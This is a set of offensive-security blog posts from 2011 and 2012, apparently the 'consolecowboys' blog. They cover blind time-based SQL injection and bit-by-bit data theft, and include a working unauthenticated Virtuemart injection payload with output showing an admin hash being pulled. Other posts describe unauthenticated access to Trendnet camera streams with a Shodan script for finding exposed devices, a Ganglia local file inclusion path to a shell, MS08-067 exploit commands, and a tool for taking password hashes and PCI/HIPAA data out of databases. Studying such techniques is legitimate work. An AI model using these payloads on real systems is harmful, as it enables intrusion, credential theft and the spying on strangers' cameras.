consolecowboys

Bit Banging your Database

2012-01-21T20:33:00.000-08:00

This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.

Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:

select length(username) from jos_users where usertype = 'Super Administrator';

Because we can't return the value back directly we have to make a query like the following iteratively:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';

We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit.

Examples showing time difference:

mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)

mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)

Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value:

Start with checking the most significant bit and continue to the least significant bit, value is '65':

value & 128
01000001
10000000
-----------
00000000

value & 64
01000001
01000000
-----------
01000000

value & 32
01000001
00100000
-----------
00000000

value & 16
01000001
00010000
--------
00000000

value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
-----------
00000000

value & 2
01000001
00000010
-----------
00000000

value & 1
01000001
00000001
-----------
00000001

The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (8.74 sec)

As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;

This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:

da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL

If you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)

mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)

mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)

mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)

Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :

if($order_id === "" || $order_id === null)
{
$vmLogger->debug("Could not find order ID via invoice");
$vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
$qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
$db->query($qv);
print($qv);
if( !$db->next_record()) {
$vmLogger->err("Error: No Records Found.");
}

The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:

POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#

Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:

python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"

[*] Getting string length

[+] username length is:5

[+] username:admin

[*] Getting string length

[+] password length is:65

[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL

The "vm_own.py" script can be downloaded here.

Trendnet Cameras - I always feel like somebody's watching me.

2012-01-10T14:44:00.000-08:00

Firstly this post requires the following song to be playing.

http://www.youtube.com/watch?v=wVfjwIyc-CU

Now that we got that out of the way... I have been seeing posts on sites with people having fun with embedded systems/devices and I was feeling left out. I didn't really want to go out and buy a device so I looked at what was laying around.

Enter the Trendnet TV-IP110w - http://www.trendnet.com/products/proddetail.asp?prod=145_TV-IP110W

To start off the latest firmware for this device can be found at the following location :

http://downloads.trendnet.com/tv-ip110w/firmware/FW_TV-IP110W_A1.x(1.1.0.104).zip

First order of business was to update the camera with the most recent firmware:

Device info page confirming firmware version

Now that the device was using the same version of firmware as I was going to dive into, lets get to work. I will be using binwalk to fingerprint file headers that exist inside the firmware file. Binwalk can be downloaded from the following url: http://code.google.com/p/binwalk/

Running binwalk against the firmware file

binwalk FW_TV-IP110W_1.1.0-104_20110325_r1006.pck
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
32320 0x7E40 gzip compressed data, from Unix, last modified: Thu Mar 24 22:59:08 2011, max compression
679136 0xA5CE0 gzip compressed data, was "rootfs", from Unix, last modified: Thu Mar 24 22:59:09 2011, max compression

Looks like there are two gzip files in the "pck" file. Lets carve them out using 'dd'. First cut the head off the file and save it off as '1_unk'

#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=1_unk bs=1 count=32320
32320+0 records in
32320+0 records out
32320 bytes (32 kB) copied, 0.167867 s, 193 kB/s

Next cut out the first gzip file that was identified, we will call this file '2'

#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=2 bs=1 skip=32320 count=646816
646816+0 records in
646816+0 records out
646816 bytes (647 kB) copied, 2.87656 s, 225 kB/s

Finally cut the last part of the file out that was identified as being a gzip file, call this file '3'

#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=3 bs=1 skip=679136
2008256+0 records in
2008256+0 records out
2008256 bytes (2.0 MB) copied, 8.84203 s, 227 kB/s

For this post I am going to ignore files '1_unk' and '2' and just concentrate on file '3' as it contains an interesting bug :) Make a copy of the file '3' and extract it using gunzip

#file 3
3: gzip compressed data, was "rootfs", from Unix, last modified: Thu Mar 24 22:59:09 2011, max compression
#cp 3 3z.gz
#gunzip 3z.gz
gzip: 3z.gz: decompression OK, trailing garbage ignored
#file 3z
3z: Minix filesystem, 30 char names

As we can see the file '3' was a compressed Minix file system. Lets mount it and take a look around.

#mkdir cameraFS
#sudo mount -o loop -t minix 3z cameraFS/
#cd cameraFS/
#ls
bin dev etc lib linuxrc mnt proc sbin server tmp usr var

There is all sorts of interesting stuff in the "/server" directory but we are going to zero in on a specific directory "/server/cgi-bin/anony/"

#cd server/cgi-bin/anony/
#ls
jpgview.htm mjpeg.cgi mjpg.cgi view2.cgi

The "cgi-bin" directory is mapped to the root directory of http server of the camera, knowing this we can make a request to http://192.168.1.17/anony/mjpg.cgi and surprisingly we get a live stream from the camera.

video stream. giving no fucks.

Now at first I am thinking, well the directory is named "anony" that means anonymous so this must be something that is enabled in the settings that we can disable.... Looking at the configuration screen you can see where users can be configured to access the camera. The following screen shows the users I have configured (user, guest)

Users configured with passwords.

Still after setting up users with passwords the camera is more than happy to let me view its video stream by making our previous request. There does not appear to be a way to disable access to the video stream, I can't really believe this is something that is intended by the manufacturer. Lets see who is out there :)

Because the web server requires authentication to access it (normally) we can use this information to fingerprint the camera easily. We can use the realm of 'netcam' to conduct our searches

HTTP Auth with 'netcam' realm

Hopping on over to Shodan (http://www.shodanhq.com) we can search for 'netcam' and see if there is anyone out there for us to watch

9,500 results

If we check a few we can see this is limited to only those results with the realm of 'netcam' and not 'Netcam'

creepy hole in the wall

front doors to some business

Doing this manually is boring and tedious, wouldn't it be great if we could automagically walk through all 9,500 results and log the 'good' hosts.... http://consolecowboys.org/scripts/camscan.py

This python script requires the shodan api libs http://docs.shodanhq.com/ and an API key. It will crawl the shodan results and check if the device is vulnerable and log it. The only caveat here is that the shodan api.py file needs to be edited to allow for including result page offsets. I have highlighted the required changes below.

def search(self, query,page=1):
"""Search the SHODAN database.

Arguments:
query -- search query; identical syntax to the website
page -- page number of results

Returns:
A dictionary with 3 main items: matches, countries and total.
Visit the website for more detailed information.

"""
return self._request('search', {'q': query,'page':page})

Last I ran this there was something like 350 vulnerable devices that were available via shodan. Enjoy.

Ganglia Monitoring System LFI

2012-01-09T19:45:00.000-08:00

Awhile back when doing a pentest I ran into an interesting web application on a server that was acting as a gateway into a juicy environment *cough*pci*cough*, the application was “Ganglia Monitoring System” http://ganglia.sourceforge.net

The scope of the test was extremely limited and it wasn't looking good....the host that was in scope had a ton of little stuff but nothing that looked like it would give me a solid foothold into the target network. After spending some time looking for obvious ways into the system I figured it would be worth looking at the Ganglia application, especially since I could find no public exploits for the app in the usual places....

First step was to build a lab up on a VM (ubuntu)

apt-get install ganglia-webfrontend

After apt was done doing its thing I went ahead and started poking around in the web front end files (/usr/share/ganglia-webfrontend). I looked to see if the application had any sort of admin functionality that I could abuse or some sort of insecure direct object reference issues. Nothing looked good. I moved on to auditing the php.

Started out with a simple grep looking for php includes that used a variable....bingo.

steponequit@steponequit-desktop:/usr/share/ganglia-webfrontend$ egrep 'include.*\$' *
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $tpl_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $include_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: $include_file = $regs[2];
class.TemplatePower.inc.php: if( !@include_once( $include_file ) )
class.TemplatePower.inc.php: $this->__errorAlert( 'TemplatePower Error: Couldn\'t include script [ '. $include_file .' ]!' );
class.TemplatePower.inc.php: $this->tpl_include["$iblockname"] = Array( $value, $type );
graph.php: include_once($graph_file);

The graph.php line jumped out at me. Looking into the file it was obvious this variable was built from user input :)

$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : NULL;

....

$graph_file = "$graphdir/$graph.php";

Taking at look at the "sanitize" function I can see this shouldn't upset any file include fun

function sanitize ( $string ) {
return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}

#-------------------------------------------------------------------------------
# If arg is a valid number, return it. Otherwise, return null.
function clean_number( $value )
{
return is_numeric( $value ) ? $value : null;
}

Going back to the graph.php file

$graph_file = "$graphdir/$graph.php";

if ( is_readable($graph_file) ) {
include_once($graph_file);

$graph_function = "graph_${graph}";
$graph_function($rrdtool_graph); // Pass by reference call, $rrdtool_graph modified inplace
} else {
/* Bad stuff happened. */
error_log("Tried to load graph file [$graph_file], but failed. Invalid graph, aborting.");
exit();
}

We can see here that our $graph value is inserted into the target string $graph_file with a directory on the front and a php extension on the end. The script then checks to make sure it can read the file that has been specified and finally includes it, looks good to me :).

The start of our string is defined in conf.php as "$graphdir='./graph.d'", this poses no issue as we can traverse back to the root of the file system using "../../../../../../../../". The part that does pose some annoyance is that our target file must end with ".php". So on my lab box I put a php file (phpinfo) in "/tmp" and tried including it...

http://localhost/ganglia/graph.php?g=/../../../../../../../../tmp/blah

Win. Not ideal, but it could work....

Going back to the real environment with this it was possible to leverage this seemingly limited vulnerability by putting a file (php shell) on the nfs server that was being used by the target server, this information was gathered from a seemingly low vuln - "public" snmp string. Once the file was placed on nfs it was only a matter of making the include call. All in a hard days work.

I have also briefly looked at the latest version of the Ganglia web front end code and it appears that this vuln still exists (graph.php)

$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
...
...
...
$php_report_file = $conf['graphdir'] . "/" . $graph . ".php";
$json_report_file = $conf['graphdir'] . "/" . $graph . ".json";
if( is_file( $php_report_file ) ) {
include_once $php_report_file;

tl;dr; wrap up - “Ganglia Monitoring System” http://ganglia.sourceforge.net contains a LFI vulnerability in the "graph.php" file. Any local php files can be included by passing its location to the "g" parameter - http://example.com/ganglia/graph.php?g=../../../../../../../tmp/shell

Web Hacking Video Series #4 MySQL Part 2 (Injection and Coding)

2011-11-11T09:51:00.000-08:00

Video Lesson Topics:

Setting up your victim application, databases and lab
Attacking a simple injection with information Schema
Automating your injections with python and beautiful soup
Dealing with various web encoding in Python and PHP
Bypassing LoadFile Size restrictions and automating it
Decrypting sensitive data via PHP and Python interactions
As always me rambling about stupid nonsense :P FTW

Part 2 of Mysql covers the topic of injecting a simple SQL injection example. Starts out slow then combines techniques and moves into more advanced topics. Prior to attempting this lesson make sure you have watched the videos in the previous blog or understand both SQL and basic python coding. I will show how to automate the injection process via python utilizing simple HTML processing abilities of beautiful soup. I will cover many python libraries for encoding data and calling web based applications. I also talk about how to deal with encrypted data and methods of enumerating files and folders looking for possible implementation issues and attack points to decrypt sensitive data via PHP/Python interaction with whats available on the server. This is the 2nd part of a 3 part series on MySQL for attacking web applications.

Files Needed:

Lab Files
BT5

Video Lesson:

Whats Next:

PHP source code analysis
Recoding PHP applications to fix SQLi

Web Hacking Video Series #3 MySQL Part 1 (SQL Primer)

2011-11-04T15:37:00.000-07:00

Video Lesson Topics:

Creating a SQL-cmdShell in python
Setting up a SQL lab/learning environment
Learning basic SQL queries
More advanced queries for pulling meaningful data
Interacting with the operating system
Basic filter bypass and built in encoding mechanisms
MySQL specific functions and structure

This part of the series is a manual sql/python tutorial which will instruct the viewer on how to create their own database interaction with python, the audience being both hackers and new developers. After connecting to the database learn how to use that interaction for pulling meaningful data from a SQL database and interacting with the underlying operating systems and DB functionality. I will cover basic to more advanced sql queries and interactions. None of the videos contain any injection whatsoever, instead a DB and SQL primer for the purpose of learning a foundation prior to trying to attack the unknown. I do delve into many topics related to injection and relate many topics to injection but everything is done on the command line in an interactive lab environment you create for yourself!! The next blog in the series will cover Injection followed by code analysis and recoding applications with parametrized queries. There will also be MSSQL based stuff in the same sequence of events in future posts.

Needed To follow Along:

BT5 VM
Test Database http://launchpad.net/test-db/employees-db-1/1.0.6/+download/employees_db-full-1.0.6.tar.bz2
The Pillager: http://consolecowboys.org/pillager/pillage_0.6.zip

Whats next:
MySql Injection

MSSQL specific learning and Labs

Source Code analysis

Recoding your applications in PHP and ASP

Part 1.1 Coding your Python SQL cmdShell:

Part 1.2 Learning SQL:

DataBase Pillager 0.5 Release (Video) Targeted data searches

2011-09-03T00:02:00.000-07:00

Updated Link + Features 9/27/2011 after this initial post (New Query-Cmd Line "-q" to drop you into a sql shell and data formatting on display)
Example: python dbpillage.py -a 127.0.0.1 -d mysql -u root -p toor -q

Release 0.6: LINK:Download Pillager 0.6

Been busy as hell lately but I am working on a lot of stuff regarding SQL and Web Hacking stuff I will release soon, but right now I am releasing the newest version of the database pillager. There are numerous new features, optimizations and future development started and some really cool stuff. Currently the newest features include:

New Features:

Database/Table Name targeted searches (done)
Targeted Data searches within columns (done)
Reporting Options (Partially done)
GUI (In development)
Universal SQL CMD shell (Done mysql,mssql)
Also fixing a few more bugs related to mssql and unicode

Video Contents:
The below video will show how to make the most of the tool and show the newest targeted data searches as well as some program structure so you can make some simple modifications.

Untitled from ficti0n on Vimeo.

Commands used:

Simple Pillage:

python dbpillage.py -a 127.0.0.1 -d mysql -u root -p toor

Grab Hashes:
python dbpillage.py -a 127.0.0.1 -d mysql -u root -p toor --hashes

Database/Table Search based on a list:
python dbpillage.py -a 127.0.0.1 -d mysql -u root -p toor -n

Targeted Data Search bases on keyword list:
python dbpillage.py -a 127.0.0.1 -d mysql -u root -p toor -D

Hipaa Search Specifically:
python dbpillage.py -a 127.0.0.1 -d mysql -u root -p toor -s hipaa

Limiting data:
python dbpillage.py -a 127.0.0.1 -d mysql -u root -p toor -s hipaa -l 1

Location of Lists:

inputFiles directory

Burp Intruder Time fields

2011-06-09T12:06:00.000-07:00

This is an update from the last video blog:

I had a update submission from Toxic after watching Web Application video #2. Although module 4 was to learn how to code custom situations... Toxic noted that there are time fields within burp intruder by adding the columns:

-Response Received
-Response Completed

You can get a number related to the seconds it took for the request to complete... For example the php code originally was set for a 2 second sleep function and so Jsmith had the following output:

Response Received: 2107

Now I upped the sleep function to 4 seconds and Jsmith has a new value of:

Response Received: 4001

I then upped the sleep function to 8 seconds and Jsmith has the new value of:
Response Received: 8002

Indicating that field actually does keep track of the time between request and response... Just another option for anyone playing with time based stuff in burp.....

GOOD CATCH TOXIC!!!!!!

Web Hacking Video Series #2 Analysis of application behavior to bypass common implementation issues

2011-06-08T13:02:00.000-07:00

Video Lesson Topics: (Running time 50+ minutes)
This lesson covers the following topics:

Analysis of application behavior to bypass common implementation issues
Writing custom python code to deal with more complex testing situations
More on burp suite intruder, comparer and scoping settings
Introducing firebug for inspecting page elements
Lots of me rambling about testing issues and real world considerations/client issues

New Hacking Lab: (USE FIREFOX)
This is my second video on application security which includes a lab of 6 different user enumeration situations. Not really to show user enumeration, but to show the various ways developers handle situations and how we can determine ways to bypass issues. Everyone can follow along and play on the website as I ramble.. I got bored Friday night and started coding, and ended up with the beginning of a mini web hacking lab that I may continue to grow out regarding certain lessons or I may allow downloading of the whole site when dealing with more dangerous topics I dont want to deploy online. Also note that I dont care about complying with microsoft internet explorers finicky page parsing issues so use firefox if you dont want viewing issues. ;)

I hope everyone learns something or at least enjoys the video if your are already a seasoned web slayer, but enjoy my rambling, that's cool too. If anyone has any good ideas regarding new videos, post a comment, I just kind of randomly thought of the last two lessons while trying to think of topics which were not beat to death in books and videos but I feel are important for those new to web.

Here are some links/tools regarding this lesson if you plan on following along..

Needed Follow Along Tools:

-Firefox (Site doesn't comply with microsoft IE standards)
-Firebug
-Firecookie
-Burp Suite
-Python
-Komodo Edit (Or editor of choice)

Web Hacking Lab:(Alpha Release):

http://consolecowboys.org/webLab/

Video link:

Analysis of application behavior to bypass common implementation issues from ficti0n on Vimeo.

Further Reading Regarding Authentication:

https://www.owasp.org/index.php/Authentication_Cheat_Sheet

.

Web Hacking Video Series #1 Automating SQLi with Burp Extractor

2011-05-07T11:14:00.000-07:00

Why:

After speaking with many penetration testers I have realized that web application hacking is a mystery for many testers who typically perform network based penetration testing but have no prior development knowledge. This post is the first in a series of Web Hacking Video Training posts that will attempt to show various techniques that prove useful in situations where you realize all avenues of attack are running across http based protocols. This is typical on external tests.

Future topics
Will include subjects such as, Extensive coverage of the burp suite, handling large scale penetration tests where there are 100's of hosts running web ports with little else to attack. Extensive Burp Suite and Metasploit usage to solve common situations while attacking applications. Understanding the underlying code via code reviews, and recoding the application. Detecting and handling Web Application firewalls(WAFS) and setting up and coding your own rules for your applications using open source WAFS. Profiling Web Services and discovering hidden functionality. Attacking deployable services, upload fields, web shells, etc etc etc. Any other ideas??

Targets:
These are just a few ideas I have, I am going to try to use targets that are realistic yet everyone can follow along with. So i will look for available applications or code up my own application targets as a lab of sorts that I will make available for download. I hate seeing tutorials and not being able to try things out. So I feel your pain and will try to find legal targets or ways for you to practice what I post.

Burp Extractor Video:
This first video is on how to use Burps Extractor option to enumerate tables,columns and display the data on the Burp Intruder window. This technique is useful when you are trying to use SQLi tools but they are failing, however you know there is an injection point and need automation to get the job done. This is less about SQLi and more about using extractor during your testing. This is NOT a SQLi tutorial, this is a Burp Suite Tutorial on Burp Extractor ;) My friend Chris shot me an email awhile ago regarding Extractor vs MSSQL and thought it was pretty sweeeeet so expanded on the idea with some more burp examples and used it for mysql since php/mysql apps are commonly found for download. :)

Automating SQL Injection with BURP Suite Extractor from ficti0n on Vimeo.

Useful Links:
DVWA: http://www.dvwa.co.uk/
Havij(where I grabbed dictionaries from): http://www.itsecteam.com/en/projects/project1_page2.htm
MYSQLi Cheatsheet: (Try these out on DVWA replacing my injections) http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

Immunity Canvas Code and CMDLine Walkthrough

2011-04-24T23:30:00.000-07:00

This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down information I decided to make a video showing Canvas basic CMDLine usage and tried to explain some module code based on my initial analysis I hope it helps

Note:
I have no previous experience with Canvas but this 20 minute video is everything I learned after playing around for a couple hours and searching everywhere for info..

Whats in this video:
-High Level Explanation of 2 modules(Exploit and Aux)
-CmdLine usage for launching exploits and Aux Modules
-Using PostEx modules after gaining a shell
-Setting up Listeners and finding modules to run

Immunity Canvas Code and CMDLine Walkthrough from ficti0n on Vimeo.

CMDLINE Flags:
-t Target
-p Port
-v Version of OS/target
-l Your listening IP
-d Your Listening port

PostEx Stuff:
help
runmodule getpasswordhashes
shellshocked
ps
killprocess

Running Exploit Without a Listener
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -v

Running Exploit with Listener
./commandlineinterface.py -v 10 -p 4445
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -l 192.168.1.121 -d 4445

DbPillage Release 0.3

2011-04-06T18:49:00.000-07:00

Database Pillager Release 0.3
(Couple New features and updates)

Quick announcement on the Database Pillager tool. I have added in new features and updated many things... Below is some info and an example.

Updated Download Link: (0.6)

http://consolecowboys.org/pillager/pillage_0.6.zip

Updates/Features:
-Grabs database password hashes from each database type when -# or --hashes is used

-Implemented Hipaa Searches for all kinds of data (just searched the web for regexes :) haha if you have more I will be happy to add them)

    * SSN
      SSN with Dashes
      SSN with spaces
      ICD10
      Carefirst ID
dental Procedure
      ICD9/ICD9CMType1
      ICD9/ICD9CMType2


CommandLine Syntax Changed:

With the new functionality also comes new syntax so make sure to check the initial screen output by simply typing:
python dbpillage.py

Simple db query example with grab hashes and HIPAA search options:

root@bt:~/pillage# python dbPillage.py -a 127.0.0.1 -d mysql -u root --pass toor --hashes -s hipaa

Grabbing User/Password hashes for mysql:
Hashes:
('root', '*9CFBBC772F3F6C106020035386DA5BBBF1249A11')
('root', '*9CFBBC772F3F6C106020035386DA5BBBF1249A11')
('root', '*9CFBBC772F3F6C106020035386DA5BBBF1249A11')

Try cracking mysql passwords with johnTheRipper

Would you also like to pillage y/n:y

Select a database to pillage:

1: information_schema
2: PCItest
3: msf3
4: mysql

Choose the database you want by typing the number next to your DB choice
Or rip through every database by typing "cowboy" to rape everything: cowboy

Parsing the the tables out of information_schema database

Searching for hipaa data in----Database:msf3| Table:campaigns
Found hipaa data: SSNDashed: Removed Sensitive data
Searching for hipaa data in----Database:msf3| Table:clients
Searching for hipaa data in----Database:msf3| Table:imported_creds
Searching for hipaa data in----Database:msf3| Table:loots
Searching for hipaa data in----Database:msf3| Table:notes
Found hipaa data: Possible SSN: Removed Sensitive data
Searching for hipaa data in----Database:msf3| Table:project_members
Searching for hipaa data in----Database:msf3| Table:refs
Searching for hipaa data in----Database:mysql| Table:time_zone_transition
Searching for hipaa data in----Database:mysql| Table:time_zone_transition_type
Searching for hipaa data in----Database:mysql| Table:user

Here is some possible HIPAA data for review
['Removed Sensitive Data']

Review the following Database:Tables pairs for HIPAA sensitive data
[['msf3', 'campaigns'], ['msf3', 'notes']]

None
Try Again? y/n:n

Hope this makes the tool more useful, there are many more features being added but I wanted to at least release the tool to everyone with the HIPAA portion implemented before I get into a bunch of other database related stuff.... If anyone has any suggestion of stuff they run into on penetration tests regarding database pillaging and enumeration please send over some ideas :)

Note, there are many HIPAA related regular expressions which might cause a number of false positives, if you are having this problem feel free to just go into the attackpci.py file and remove all but the SSN related info if that's all your actually wanting to search for. Also if you have suggestions of other stuff to search for or want to donate some reg-ex... YAY

The Database Pillager (tool release)

2011-03-28T00:39:00.000-07:00

The Database Pillager
(Usage Tutorial, Tool Release 0.1)

I coded up a Database Pillaging tool for multiple database types which can be downloaded below I would host this tool on some kind of code hosting site but they all seem to be a pain in my ass so it will stay in zip format until I find one that isn't a pain to use or doesn't just display all of my personal data.

UPDATED DOWNLOAD LINK v0.6: Also updated post for new syntax added new features since htis post but updated the syntax on this post )
http://consolecowboys.org/pillager/pillage_0.6.zip

Why?

Since I have yet to find a post exploitation database tool that works well for me, I coded my own. This project was created to solve a reoccurring problem I have had searching and retrieving PCI/HIPPA data after I have compromised the domain or obtained local database credentials and I still need to prove that I have access to sensitive data. I have found this tool useful for many reasons including finding session tokens, passwords and creditcards in databases. The Database Pillager (DBPillage) was created to fulfill the following goals and is still in active development by myself and other contributors.

Goals:

-Automatically search Specified Tables and Database for PCI/HIPPA

-Validate found credit cards with Mod10 checks

-Browse and view data from specified Columns

-Rip through whole database for Compliance data

-Support multiple database types (Oracle, MSSQL, MYSQL, PostGreSQL)

Future Plans:

-Search based on database keywords

-Add reporting in multiple formats (Web / PDF / XML)

-LDAP/AD domain integration for MSSQL
-Possible integration with OpenDLP

Tested Platform:

BT4R2 with cxoracle and postgres python packages installed.

cx_oracle (cx-oracle.sourceforge.net)

psycopg2 (initd.org/psycopg/download/)

Overview:

Below is a quick walkthrough on how I have used this tool effectively. I have included an oracle example and a mysql example, I would show MSSQL but I don't have one handy at the moment, dbpillage has been extensively tested on Oracle and Mysql, but should also be working just fine on MSSQL and PostgresSQL I just haven’t had as much access to MSSQL /PostGreSQL databases for testing. I am currently working on pillaging using domain credentials.

Oracle Run through on a few features:

OracleTip:

When using oracle try different usernames/SID combinations as some users don’t have access to some data.

Command Format for Oracle:
python dbPillage -a Ipaddress -d databaseType -u Username -p Password --limit

All options can be viewed by typing “python dbpillage” and last option "limit" is a patch my coworker Tim submitted for me, if you put a number at the end of the cmdline it will pull only that many tables, speeds up searches and is nice if you are using the tool to browse data rather than search data. I do need to however modify that to ignore NullValue tables. It’s on my ToDo list.

Note: If you just type python dbpillage.py you will also get the below help information!!!!

        [---]       The Database Pillager (DBPillage)          [---]
        [---]              Authors: Ficti0n,                     [---]
        [---]              Contributors: Steponequit           [---]
        [---]                 Version: 0.3                                    [---]
        [---]         Find Me On Twitter: ficti0n                   [---]


        About:
        The Database Pillager is a multiplatform database tool for searching and browsing common database types encountered while penetration testing. DBPillage can be used to search for PCI/HIPAA data automatically or use DBPillage to browse and display data. DBpillage was designed as a post exploitation pillaging tool with a goal of targeted extraction of data without the use of database platform specific GUI based tools that are difficult to use and make my job harder.

        Supported Platforms:
        --------------------
        -Oracle
        -MSSQL
        -MYSQL
        -PostGreSQL

        Usage Examples:
        ************************************************************************
        For Mysql Postgres and MsSQL pillaging:
        ---------------------------------------
        python dbPillage -a ipaddress -d databaseType -u Username -p Password

        For Oracle pillaging you need a SID connection string:
        ------------------------------------------------------
        python dbPillage -a address/SID -d databaseType -u username -p Password

        Grab some hashes:
        -----------------
        python dbPillage -a address -d databaseType -u username -p Password --hashes
        ************************************************************************
        Switch Options:
        ---------------------
        -# --hashes = grab database password hashes
        -l --limit = limit the amount of rows that are searched or when displaying data (options = any number)
        -s --searchType = Type of data search you want to perform (options:pci, hipaa, all)
        -u --user = Database servers username
        -p --pass = Password for the database server
        -a --address = Ipaddress of the database server
        -d --database = The database type you are pillageing (options: mssql,mysql,oracle,postres)

        Prerequisites:
        -------------
        python v2 (Tested on Python 2.5.2 BT4 R2)
        cx_oracle (cx-oracle.sourceforge.net)
        psycopg2 (initd.org/psycopg/download/)
        MySQLdb   (should be on BT by default)
        pymssql   (should be on BT by default)

Example 1: Cowboy Search All mode… (grab every DB and Table and search for CC numbers by default, use --s hippa or all for other datasearches )

Note: You can try this out with OracleOnVmware, that's what I used

